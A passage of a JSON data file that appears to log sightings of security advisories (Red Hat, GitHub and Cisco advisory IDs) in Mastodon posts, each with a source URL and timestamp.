"1752b34b-9464-40ff-b630-a58d37197a3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2769", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497869157795659", "content": "", "creation_timestamp": "2024-11-17T10:40:45.189195Z"}, {"uuid": "2e35aa86-7e40-45df-a6c3-95e112df1cdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0741", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497917095715119", "content": "", "creation_timestamp": "2024-11-17T10:52:56.604699Z"}, {"uuid": "698a49f6-4ce4-4298-a207-9f2acb9a5c24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1267", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113497917095715119", "content": "", "creation_timestamp": "2024-11-17T10:52:56.630159Z"}, {"uuid": "8a7bef27-2eb2-4d19-9076-d5bf8c89cdd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vp6v-whfm-rv3g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113589978642754398", "content": "", "creation_timestamp": "2024-12-03T17:05:24.394655Z"}, {"uuid": "4d22409b-6e78-4bd0-af93-d626f38c4bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hj3w-wrh4-44vp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522000459979063", "content": "", "creation_timestamp": "2024-11-21T16:57:39.888955Z"}, {"uuid": "e0e69f9e-bf3b-4a7c-bcc8-a445fffa471f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r6wx-627v-gh2f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113601285537968378", "content": "", "creation_timestamp": "2024-12-05T17:00:53.793103Z"}, {"uuid": "d65dab56-5810-4cf1-8753-3b72e3563489", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjgr-7834-rhxr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113589996240573115", "content": "", "creation_timestamp": "2024-12-03T17:09:52.936565Z"}, {"uuid": "1cf53ad8-dcf3-43dc-9c88-83bf478bf6dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-49cc-xrjf-9qf7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522077482345132", "content": "", "creation_timestamp": "2024-11-21T17:17:14.869625Z"}, {"uuid": "3c693e88-36f6-42fc-8a2d-5c1b55dd2978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x77j-w7wf-fjmw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113549027953253099", "content": "", "creation_timestamp": "2024-11-26T11:31:06.296771Z"}, {"uuid": "775c7514-0bcb-4030-b225-4956dce10def", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q6mv-284r-mp36", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113567765118810869", "content": "", "creation_timestamp": "2024-11-29T18:56:12.901836Z"}, {"uuid": "b6fd1ce9-e2be-479f-880d-bbd27f14249b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20200108-anyconnect", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794960904947", "content": "", "creation_timestamp": "2024-12-17T06:41:54.389651Z"}, {"uuid": "544950ea-d77c-405f-8317-1f80b35837be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181017-wlc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794973785444", "content": "", "creation_timestamp": "2024-12-17T06:41:54.534227Z"}, {"uuid": "650ce5bd-ced7-42ed-a281-34d809efcfcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180117-elm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794990072529", "content": "", "creation_timestamp": "2024-12-17T06:41:54.603862Z"}, {"uuid": "3d67629b-2eea-47d8-88c3-b552feb42658", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20170927-nat", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342503894798", "content": "", "creation_timestamp": "2024-12-17T09:00:21.726682Z"}, {"uuid": "9f8195c0-a1ee-4539-814c-6a852d4bc1c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191016-firepwr", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342524019966", "content": "", "creation_timestamp": "2024-12-17T09:00:24.945486Z"}, {"uuid": "24c4053e-f180-41d3-87e9-98993f247cb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191120-stealth", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342529475903", "content": "", "creation_timestamp": "2024-12-17T09:00:26.408157Z"}, {"uuid": "eb446f40-cbe9-4efa-bf3a-2ca0782e2ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180418-asaanyconnect", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342560004368", "content": "", "creation_timestamp": "2024-12-17T09:00:28.708089Z"}, {"uuid": "e70a3ee9-ffa9-4452-9660-f2dd454a5d87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190821-imc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342579725182", "content": "", "creation_timestamp": "2024-12-17T09:00:30.116001Z"}, {"uuid": "6ca3e585-edab-4652-a1e3-f7d12a0bb4ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20200226-fxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342596033646", "content": "", "creation_timestamp": "2024-12-17T09:00:31.288225Z"}, {"uuid": "b6020ac7-9a9d-43c3-857f-ece72c8b4467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190306-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342590103573", "content": "", "creation_timestamp": "2024-12-17T09:00:31.375070Z"}, {"uuid": "9789b3ea-c932-481b-979a-5e73ef45ca93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20170927-cc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342601123638", "content": "", "creation_timestamp": "2024-12-17T09:00:31.841231Z"}, {"uuid": "08266ea2-7000-4572-b694-ffc008edef60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190807-sd", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342630613588", "content": "", "creation_timestamp": "2024-12-17T09:00:32.943122Z"}, {"uuid": "6fc4f432-1247-4ead-a16a-0b1bf3e9754b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180207-asr", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342625603657", "content": "", "creation_timestamp": "2024-12-17T09:00:33.348758Z"}, {"uuid": "d64119e2-b800-44cd-aa0d-aabc33e7a510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190306-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342635335661", "content": "", "creation_timestamp": "2024-12-17T09:00:33.582706Z"}, {"uuid": "71cd56ca-ee1b-4c8d-9566-d9498131e7bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190123-sdwan", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342640178071", "content": "", "creation_timestamp": "2024-12-17T09:00:34.642756Z"}, {"uuid": "8f22eb1b-3e71-4d64-9568-5abec257b04d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181003-dna", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342650171653", "content": "", "creation_timestamp": "2024-12-17T09:00:34.954205Z"}, {"uuid": "4d0dc060-393e-4e55-9198-22c5b8f66e8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190807-nfv", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342676998555", "content": "", "creation_timestamp": "2024-12-17T09:00:35.657606Z"}, {"uuid": "1bbd1c5b-054e-4a25-95b7-a14269cd1b72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191120-webex", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342691866661", "content": "", "creation_timestamp": "2024-12-17T09:00:35.785310Z"}, {"uuid": "cf0e4d06-5999-4d01-bc2d-6689d6dc1388", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180418-wlc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342681977139", "content": "", "creation_timestamp": "2024-12-17T09:00:35.839036Z"}, {"uuid": "7b43612f-2570-4126-89cd-d41b1094a928", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190925-tsec", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342686934813", "content": "", "creation_timestamp": "2024-12-17T09:00:35.906079Z"}, {"uuid": "d0d5cd91-3ace-4553-a7c4-5fa455b75faa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190515-cuic", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342696034701", "content": "", "creation_timestamp": "2024-12-17T09:00:35.979998Z"}, {"uuid": "7f92a9fd-23df-4866-baff-0f0bad6dc672", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhjf-q2qw-rvx3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113664325321574528", "content": "", "creation_timestamp": "2024-12-16T20:12:44.509732Z"}, {"uuid": "f68e686f-3d04-4aba-9c2b-9af5426a7927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190417-umbrella", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792715220337", "content": "", "creation_timestamp": "2024-12-17T06:40:23.411085Z"}, {"uuid": "f05aff3b-4b5a-4021-9766-4e8946d1d1e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190215-runc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792719494680", "content": "", "creation_timestamp": "2024-12-17T06:40:26.147288Z"}, {"uuid": "6e475a72-e7a9-4802-aa78-6f1899ef34ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190703-nfvis", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792727876196", "content": "", "creation_timestamp": "2024-12-17T06:40:27.277708Z"}, {"uuid": "698ea451-f351-4e23-b5d2-5f1d477aafa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180905-acsxxe", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792759785798", "content": "", "creation_timestamp": "2024-12-17T06:40:37.735167Z"}, {"uuid": "c78eaa59-8c99-4572-9806-ecffe084816f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190507-esc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792754935624", "content": "", "creation_timestamp": "2024-12-17T06:40:39.082993Z"}, {"uuid": "d0628219-44b1-4b80-b093-1bc37ca315cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190327-call", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792769462732", "content": "", "creation_timestamp": "2024-12-17T06:40:40.055399Z"}, {"uuid": "8a46509e-7d67-4e22-80d0-ac7d38be418d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180207-cps", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792779739071", "content": "", "creation_timestamp": "2024-12-17T06:40:42.130497Z"}, {"uuid": "b59ea8ec-f80d-4d8d-b10d-823ec2cef2c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180207-ios", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792775517368", "content": "", "creation_timestamp": "2024-12-17T06:40:42.309829Z"}, {"uuid": "6368c076-5c32-45f1-be12-4386bc5bf4f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190220-webx", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792807278912", "content": "", "creation_timestamp": "2024-12-17T06:40:49.374561Z"}, {"uuid": "319a8510-3658-44e7-972b-53cd0dc2d234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191106-idn", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792820956417", "content": "", "creation_timestamp": "2024-12-17T06:40:49.999182Z"}, {"uuid": "b4cb3845-a3df-4d14-badf-15f5761db494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190306-tetra", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792825211218", "content": "", "creation_timestamp": "2024-12-17T06:40:50.857364Z"}, {"uuid": "e04549da-aad2-4552-8237-ec5570a04193", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190717-wsma", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792833808768", "content": "", "creation_timestamp": "2024-12-17T06:40:54.356385Z"}, {"uuid": "bdb1a353-73e0-40ad-b3d2-dc92c0740129", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190807-fnd", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792845382500", "content": "", "creation_timestamp": "2024-12-17T06:40:56.706971Z"}, {"uuid": "0522be5d-3607-4581-b94d-e847f2914e4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180711-staros", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792840986827", "content": "", "creation_timestamp": "2024-12-17T06:40:56.780347Z"}, {"uuid": "2bc59a80-2a82-48b2-9e2a-021666782c8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180207-esacsm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792858959856", "content": "", "creation_timestamp": "2024-12-17T06:40:57.448994Z"}, {"uuid": "aa7805e5-5fe8-4c99-8d45-da575650e31d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190501-apic", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792863457134", "content": "", "creation_timestamp": "2024-12-17T06:40:58.010113Z"}, {"uuid": "25949e19-cabb-430e-a8ff-96d3e7390839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191002-cucm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792876511565", "content": "", "creation_timestamp": "2024-12-17T06:40:58.167094Z"}, {"uuid": "c7b4c307-3b7e-4958-a64d-3b99e6deaac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190327-mgmtacl", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792872038700", "content": "", "creation_timestamp": "2024-12-17T06:40:58.243591Z"}, {"uuid": "28a2b9aa-b6b0-4ab1-96c5-977a35d0088d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190327-rsp3", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792904754086", "content": "", "creation_timestamp": "2024-12-17T06:41:00.176990Z"}, {"uuid": "cb549091-0d94-41d5-9672-87cc15f73c2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190828-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792900100231", "content": "", "creation_timestamp": "2024-12-17T06:41:00.528110Z"}, {"uuid": "c8e6da9c-d8a2-44c1-8ce6-cad1e8b9efcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190515-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792915206648", "content": "", "creation_timestamp": "2024-12-17T06:41:01.519904Z"}, {"uuid": "2b0de335-9902-4283-b385-a99f6c012c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190123-rv", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792924025627", "content": "", "creation_timestamp": "2024-12-17T06:41:03.333550Z"}, {"uuid": "13911b71-ab4c-4c6b-9dd3-fc8374267c2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20200108-webex", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792943846935", "content": "", "creation_timestamp": "2024-12-17T06:41:05.086415Z"}, {"uuid": "25a7110a-d803-4047-8208-6a87c840bfe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181128-plm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792948749099", "content": "", "creation_timestamp": "2024-12-17T06:41:05.991400Z"}, {"uuid": "95594551-fba0-43f0-b6cb-2d14a1a0eab2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190515-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792953577446", "content": "", "creation_timestamp": "2024-12-17T06:41:07.335329Z"}, {"uuid": "c533a27f-de50-4fc7-a588-7cc891e4d6a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180207-ucm1", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792958182205", "content": "", "creation_timestamp": "2024-12-17T06:41:07.643166Z"}, {"uuid": "4c1eb3f6-b14d-4f53-9dbf-2afef22ebe44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180926-ptp", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666792986239653", "content": "", "creation_timestamp": "2024-12-17T06:41:11.506213Z"}, {"uuid": "098764d2-c66b-40be-9805-4ef0728146a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181003-unity", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793096536372", "content": "", "creation_timestamp": "2024-12-17T06:41:27.357958Z"}, {"uuid": "441c8f00-18ab-4b81-b551-5dd724de3519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20170726-anicrl", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793199285399", "content": "", "creation_timestamp": "2024-12-17T06:41:30.418855Z"}, {"uuid": "2d71ad4b-5ddb-4d32-8504-1ff7499a2777", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181017-sm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793178357329", "content": "", "creation_timestamp": "2024-12-17T06:41:30.772198Z"}, {"uuid": "ce6e2c3a-b43e-4cbb-816e-8d3e8e89112c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180905-dcnm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793218048781", "content": "", "creation_timestamp": "2024-12-17T06:41:30.909681Z"}, {"uuid": "1498dfd3-a1ee-4835-adcd-8ed5465717dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190515-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793245990673", "content": "", "creation_timestamp": "2024-12-17T06:41:31.159360Z"}, {"uuid": "94238b83-335b-4ae2-a5cf-1fe2e036c506", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190404-rv", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793295126611", "content": "", "creation_timestamp": "2024-12-17T06:41:31.801145Z"}, {"uuid": "f72ac6eb-fd25-4f7c-9308-7d026c15fada", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190327-iosxe", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793371180738", "content": "", "creation_timestamp": "2024-12-17T06:41:34.238758Z"}, {"uuid": "ad20b748-ad0e-4ea4-b124-6b531ab228a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190515-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793422113835", "content": "", "creation_timestamp": "2024-12-17T06:41:35.995306Z"}, {"uuid": "caeac334-2358-419c-a3e4-b99e8c4a3b0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180502-aironet", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793448923269", "content": "", "creation_timestamp": "2024-12-17T06:41:38.132604Z"}, {"uuid": "352b6243-b65c-40af-a1ab-f12b4d0ef17d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180606-waas", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793510827434", "content": "", "creation_timestamp": "2024-12-17T06:41:40.790830Z"}, {"uuid": "14c5ebcf-2f59-4898-bf6a-43c1a76281ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190821-rphy", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793529477205", "content": "", "creation_timestamp": "2024-12-17T06:41:41.765032Z"}, {"uuid": "f2a1da07-9b31-46ab-bce6-73a9f238e3a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20170322-xeci", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793578390779", "content": "", "creation_timestamp": "2024-12-17T06:41:44.351726Z"}, {"uuid": "69909410-4055-41b9-9049-22fd98233ded", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190828-nexus", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793573300788", "content": "", "creation_timestamp": "2024-12-17T06:41:44.432522Z"}, {"uuid": "0cf3f8d8-a126-496f-860c-e29ad988c0ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190717-spa500", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793582617916", "content": "", "creation_timestamp": "2024-12-17T06:41:45.122988Z"}, 